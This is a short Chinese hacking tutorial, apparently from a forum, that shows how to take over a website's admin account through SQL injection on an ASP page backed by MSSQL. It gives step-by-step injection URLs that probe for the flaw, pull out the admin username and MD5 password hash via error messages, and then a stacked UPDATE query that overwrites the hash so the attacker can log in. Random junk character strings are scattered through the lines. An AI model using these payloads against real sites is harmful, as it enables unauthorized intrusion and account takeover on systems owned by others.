经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。/ s+ k" A, D7 Q' v. T
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)3 j; u5 e. p8 Q' {# o
测试如下:9 v+ Y! U4 v- F
http://www.tmdsb.com/news.asp?id=121
' k, c, b2 g) B- g: U在地址后输入单引号,显示6 ?+ C! w$ \ B3 O9 d# V
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
# l2 Q" a* Z0 `: m3 n1 r6 c字符串 ’’’ 之前有未闭合的引号2 g3 q( f, h2 e6 p0 E, @
/news/tmdws.asp,行63
, A) r5 @# k0 M% @1 x7 \: g- L说明没有过滤单引号且数据库是MSSQL.- i7 m5 z8 I! l9 Q& r. @$ Y
and 1=1正常。and 1=2出错。肯定存在注入
$ _/ N I- s" R接着输入# {+ f7 P2 H" x i$ c' I. H4 j
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
. i7 K( D8 o0 P# i- U. |6 O5 L! u得到帐号为:admin2 A7 R& Z: U+ g! U5 W( v1 S
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)/ Q) C, w* Q7 F* Q
得到密码为:a4716077c2ba075c d" N$ N2 P- o0 ?# J+ ^- J" g
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
% n; B& A# w9 E3 a命令如下 :0 H% p% C) y8 g# C+ L' p$ H
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–7 `0 ?* ~% I* @$ S8 f
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |